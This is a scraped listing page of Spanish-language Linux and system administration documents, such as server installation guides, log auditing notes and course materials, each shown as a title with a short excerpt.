Facultad de Ingeniería Universidad de Buenos Aires. 75.08 Sistemas Operativos Lic. Ing. Osvaldo Clúa Lic. Adrián Muccio. Facultad de Ingeniería Universidad de Buenos Aires 75.08 Sistemas Operativos Lic. Ing. Osvaldo Clúa Lic. Adrián Muccio Shell Scripting I Qué es Unix? Evolución desde Multics Sistemas Abiertos Sabores Dennis

Más detalles

Servidor Apache. Instalación Configuración Apache con Webmin 24/03/2014. Vicente

Servidor Apache. Instalación Configuración Apache con Webmin 24/03/2014. Vicente Servidor Apache Instalación Configuración Apache con Webmin 24/03/2014 Vicente Instalación Configuración Apache con Webmin Así como Windows tiene el Administrador de Servidor en sus Server2003 o Server2008

Más detalles

Herramientas de seguridad: Logcheck. 1.- Introducción -- La problemática a resolver

Herramientas de seguridad: Logcheck. 1.- Introducción -- La problemática a resolver Herramientas de seguridad: Logcheck Gunnar Wolf Departamento de Seguridad en Cómputo 1.- Introducción -- La problemática a resolver Como administradores de sistemas todos sabemos que tenemos que leer las

Más detalles

CAPÍTULO 5 PRUEBAS DEL SISTEMA DE DEFENSA

CAPÍTULO 5 PRUEBAS DEL SISTEMA DE DEFENSA PRUEBAS DEL SISTEMA DE DEFENSA 117 PRUEBAS DEL SISTEMA DE DEFENSA 5.1 PLAN DE PRUEBAS En este capítulo se hace una serie de pruebas dirigidas a ciertas áreas del sistema de defensa con los siguientes objetivos

Más detalles

Instalación y configuración de un servidor de base de datos MySQL 4.1 y su réplica en Red Hat Linux ES 4.0 o Fedora.

Instalación y configuración de un servidor de base de datos MySQL 4.1 y su réplica en Red Hat Linux ES 4.0 o Fedora. Instalación y configuración de un servidor de base de datos MySQL 4.1 y su réplica en Red Hat Linux ES 4.0 o Fedora. Toni de la Fuente Díaz http://blyx.com Septiembre 2006 Introducción:...1 Datos de interés

Más detalles

Certificación LPIC-1, examen 117-101

Certificación LPIC-1, examen 117-101 Certificación LPIC-1, examen 117-101 NOTA: Este documento contiene un listado de preguntas tipo para el examen 117-101 de la certificación LPIC-1 realizado en marzo de 2011. La fundación LPI no permite

Más detalles

Utfsm jmc. SO Linux. Redes. Miguel Varas

Utfsm jmc. SO Linux. Redes. Miguel Varas Utfsm jmc SO Linux Redes Miguel Varas Parte final del curso Servicios Internet [1] Minirepaso linux básico y redes [2] DNS [3] Servidor web [4] Servidor de correo [5] Administración de cortafuegos [6]

Más detalles

Logs y Auditoría. Autores: Carolina García Antón Günther Rodríguez Díaz

Logs y Auditoría. Autores: Carolina García Antón Günther Rodríguez Díaz Logs y Auditoría Autores: Carolina García Antón Günther Rodríguez Díaz Logs y Auditoría Contenido: Introducción Archivos Utilidades Lastlog Last Barredores Syslog Logrotate Otras herramientas Logs y Auditoría

Más detalles

2º Unidad Didáctica. Actualización de contenidos. Eduard Lara

2º Unidad Didáctica. Actualización de contenidos. Eduard Lara 2º Unidad Didáctica Actualización de contenidos Eduard Lara 1 ÍNDICE 1. Internet y Servicios web Servidor Web Cliente Web Servicios FTP Cliente FTP Servidor FTP 2 1. INTERNET Y SERVICIOS WEB El servicio

Más detalles

Introducción a Linux. II.

Introducción a Linux. II. Introducción a Linux. II. 1. más acerca de los comandos A excepción de unos pocos comandos, los comandos de Unix y Linux son cada uno de ellos un programa ejecutable. Cuando tipeas un comando, el shell

Más detalles

PROYECTO INTEGRADO CLUSTER DE ALTA DISPONIBILIDAD CON HAPROXY Y KEEPALIVED

PROYECTO INTEGRADO CLUSTER DE ALTA DISPONIBILIDAD CON HAPROXY Y KEEPALIVED PROYECTO INTEGRADO CLUSTER DE ALTA DISPONIBILIDAD CON HAPROXY Y KEEPALIVED Obra bajo licencia Creative Commons 1 21 de Diciembre de 2012 Índice de contenido Introducción...3 Topología de red...4 Instalación

Más detalles

El Sistema Operativo Linux

El Sistema Operativo Linux Introducción El Sistema Operativo Linux La mayor parte de los ordenadores que existen en la actualidad están diseñados de forma que puedan ejecutar diversas tareas o programas. Es evidente, que si cada

Más detalles

7º Unidad Didáctica. Protocolos TELNET y SSH. Eduard Lara

7º Unidad Didáctica. Protocolos TELNET y SSH. Eduard Lara 7º Unidad Didáctica Protocolos TELNET y SSH Eduard Lara 1 1. SERVIDOR TELNET Telnet viene de TELecommunication NETwork. Es el nombre de un protocolo de red y del programa informático que implementa el

Más detalles

INSTALACIÓN Y CONFIGURACIÓN LINUX MINT 8 HELENA

INSTALACIÓN Y CONFIGURACIÓN LINUX MINT 8 HELENA INSTALACIÓN Y CONFIGURACIÓN LINUX MINT 8 HELENA PARA NUEVOS USUARIOS Diseñado y Preparado por: José Luis Alonzo (Jolmav) soporte: http://www.linuxmint-hispano.com Santiago, República Dominicana 2009 TEMA

Más detalles

MultiBase y Cosmos. Particularidades sobre la instalación del motor de base de datos en modo cliente servidor. BASE 100, S.A. www.base100.

MultiBase y Cosmos. Particularidades sobre la instalación del motor de base de datos en modo cliente servidor. BASE 100, S.A. www.base100. Particularidades sobre la instalación del motor de base de datos en modo cliente servidor BASE 100, S.A. www.base100.com Índice 1. INSTALACIÓN EN CLIENTE SERVIDOR... 3 1.1 EN LA MÁQUINA SERVIDOR... 3 1.1.1

Más detalles

Inserte el CD de instalacion de Linux Debian Lenny, seleccione la opcion Graphical install y presione Enter

Inserte el CD de instalacion de Linux Debian Lenny, seleccione la opcion Graphical install y presione Enter Inserte el CD de instalacion de Linux Debian Lenny, seleccione la opcion Graphical install y presione Enter Seleccione el idioma Spanish. Español y presione Enter Seleccionamos el País Venezuela y presione

Más detalles

SESION 2 9 Abril 2011

SESION 2 9 Abril 2011 SESION 2 9 Abril 2011 1. Clustering VI: Aplicaciones 2. Clustering VII: Monitorización y Contabilidad 3. Clustering VIII: Seguridad y Soporte a usuarios 4. Práctica I: Despliegue de un cluster

Más detalles

1 of 10 31/01/08 16:02 Cluster Mysql 5.X De Telefonica I+D - Division 6123 Explicaremos cómo instalar y configurar un Mysql 5.0 Cluster sobre Centos 5 Autor: Edwin Plauchu mail to: j4nusx@gmail.com Tabla

Más detalles

Compartiendo conocimiento... Guía básica de instalación de Asterisk 11 en Centos6.5

Compartiendo conocimiento... Guía básica de instalación de Asterisk 11 en Centos6.5 Compartiendo conocimiento... Guía básica de instalación de Asterisk 11 en Centos6.5 (c) 2014 Xavier Jiménez Índice de contenido Introducción y propósito del documento...1 Instalación de CentOS...1 Instalación

Más detalles

CENTRO DE BACHILLERATO TECNOLÓGICO INDUSTRIAL Y DE SERVICIOS #166 Pablo Torres Burgos

CENTRO DE BACHILLERATO TECNOLÓGICO INDUSTRIAL Y DE SERVICIOS #166 Pablo Torres Burgos INSTRUCCIONES: Crear una máquina virtual con CentOS. Esperar a que cargue el SO y abrir una terminal de comandos. Realizar lo siguiente. NOTA: Para cada comando que se ejecute exitosamente: tomar una captura

Más detalles

Luis Gómez Miralles escert-upc Salamanca, 28 de octubre de 2004

Luis Gómez Miralles escert-upc Salamanca, 28 de octubre de 2004 Luis Gómez Miralles escert-upc Salamanca, 28 de octubre de 2004 1. Introducción 2. Marco legal 3. Adquisición de datos 4. Análisis 5. Caso práctico 6. Referencias Multitud de términos: - Análisis Forense

Más detalles

MÁSTER ONLINE EN ADMINISTRACIÓN LINUX

MÁSTER ONLINE EN ADMINISTRACIÓN LINUX MÁSTER ONLINE EN ADMINISTRACIÓN LINUX Módulo 1 Hardware & Arquitectura de sistemas - 20 horas Este módulo permite conocer y configurar los elementos básicos del hardware del sistema, como también otros

Más detalles

PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS. (FTP)

PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS. (FTP) PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS. (FTP) AUTORÍA ÁNGEL LUIS COBO YERA TEMÁTICA SERVICIOS DE INTERNET ETAPA BACHILLERTATO, CICLOS FORMATIVOS. Resumen En este artículo, se explican los conceptos necesarios

Más detalles

SISTEMAS OPERATIVOS Profesor: Luis Alfonso Jiménez Piedrahita

SISTEMAS OPERATIVOS Profesor: Luis Alfonso Jiménez Piedrahita Samba es una suite de aplicaciones Unix que habla el protocolo SMB (Server Message Block). Muchos sistemas operativos, incluídos Windows y OS/2, usan SMB para operaciones de red cliente-servidor. Mediante

Más detalles

Introducción. Instalación de Apache Tomcat PASO 1: PASO 2: PASO 3: PASO 4:

Introducción. Instalación de Apache Tomcat PASO 1: PASO 2: PASO 3: PASO 4: Introducción El presente documento es una guía rápida de instalación de alguna herramienta particular. De seguro existen otras formas de realizar el proceso de instalación, pero esta es la que mejor le

Más detalles

Guía de Instalación Abril-2009

Guía de Instalación Abril-2009 Antes que empiece a copiar datos en el servidor de copia el servidor MBO (el servidor MBO), necesita instalar MBO Manager (MBO) en su ordenador. Instalar MBO en Windows Siga les instrucciones del asistent

Más detalles

Calendarización de tareas. Automatización tareas: cron

Calendarización de tareas. Automatización tareas: cron Calendarización de tareas el sistema crontab Lámina 1 Automatización tareas: cron Sistema que permite a los usuarios crear trabajos que corre en un determinado momento. Cada usuario cuenta con su propio

Más detalles

Administración de Sistemas Operativos

Administración de Sistemas Operativos Administración de Sistemas Operativos Supuesto Práctico Realizado por: José ángel García Fernández Ícaro Fernández Martin 1 INDICE 1. Introducción 2. Diseño 2.1. Cliente Windows XP 2.2. Servidor DNS y

Más detalles

SAMBA 5.1 INTRODUCCION 5.2 INSTALACIÓN 5.3 CONFIGURACIÓN

SAMBA 5.1 INTRODUCCION 5.2 INSTALACIÓN 5.3 CONFIGURACIÓN SAMBA 5.1 INTRODUCCION La aparición de Windows for Workgroups (WfW), llevó aparejada la aparición de un protocolo de compartición de servicios desarrollado por Microsoft.. Este protocolo llamado SMB (Server

Más detalles

Mantenimiento del espacio web

Mantenimiento del espacio web Mantenimiento del espacio web 11 Actualizaciones de Joomla! La actualización a las nuevas versiones de Joomla! es siempre necesaria si queremos que nuestro espacio web no tenga vulnerabilidades peligrosas,

Más detalles

Instalación y configuración de Filezilla Server

Instalación y configuración de Filezilla Server Instalación y configuración de Filezilla Server OBJETIVOS Instalar y configurar un servidor FTP open source (Filezilla Server). Administrar y crear usuarios y grupos en Filezilla Server. Configurar y establecer

Más detalles

Logs y Auditoría. Información sobre los procesos. Equipo docente Sistemas Operativos

Logs y Auditoría. Información sobre los procesos. Equipo docente Sistemas Operativos Logs y Auditoría Información sobre los procesos Equipo docente Sistemas Operativos Universidad de Las Palmas de Gran Canaria 30/11/11 Logs y Auditoría 1 30/11/11 Logs y Auditoría 2 ps Informa sobre el

Más detalles

Moisés García Ruiz 03/12/2011

Moisés García Ruiz 03/12/2011 IES GONZALO NAZARENO Osmius Monitorización de Dispositivos y Servicios en Red Moisés García Ruiz 03/12/2011 Documentación enfocada a la instalación, configuración del sistema Osmius, también veremos breves

Más detalles

GUÍA DE INSTALACIÓN DE SLACKWARE LINUX 11.0 v. 1.0

GUÍA DE INSTALACIÓN DE SLACKWARE LINUX 11.0 v. 1.0 GUÍA DE INSTALACIÓN DE SLACKWARE LINUX 11.0 v. 1.0 Autor: eli@s (Elías Cuellar Rodríguez) Licencia: GPL Fecha: 20 de Abril de 2007 UNIVERSIDAD PERUANA UNIÓN FACULTAD DE INGENIERÍA EAP de Ingeniería de

Más detalles

Nivel Básico/Intermedio/Avanzado. Instalar y Configurar Servidores GNU/Linux. Administrar Servidores GNU/Linux. Proteger ante ataques a Servidores.

Nivel Básico/Intermedio/Avanzado. Instalar y Configurar Servidores GNU/Linux. Administrar Servidores GNU/Linux. Proteger ante ataques a Servidores. GNU/Linux CentOS Nivel Básico/Intermedio/Avanzado Instalar y Configurar Servidores GNU/Linux. Administrar Servidores GNU/Linux. Proteger ante ataques a Servidores. Optimizar Servidores GNU/Linux y virtualizar

Más detalles

ASO. Instalación de RedHat Linux 1

ASO. Instalación de RedHat Linux 1 ASO. Instalación de RedHat Linux 1 3.1 Pasos previos a la instalación Al igual que se realizó para Windows NT, es necesario considerar una fase previa a la instalación: Análisis del sistema y adquisición

Más detalles

El sistema operativo Linux

El sistema operativo Linux El sistema operativo Linux Introducción Que es linux Sistema operativo que emula UNIX Creado por un estudiante, Linus Torvald, para poder hacer sus prácticas en un PC. Nace en 1991 Linux 1.0 en 1994 2.2

Más detalles

Administración de GNU/Linux

Administración de GNU/Linux Administración de GNU/Linux Curso de Utilización y Administración avanzada de sistemas GNU/Linux y aplicaciones de Software Libre para estudiantes universitarios Pablo Cabezas Mateos Índice Qué debe conocer

Más detalles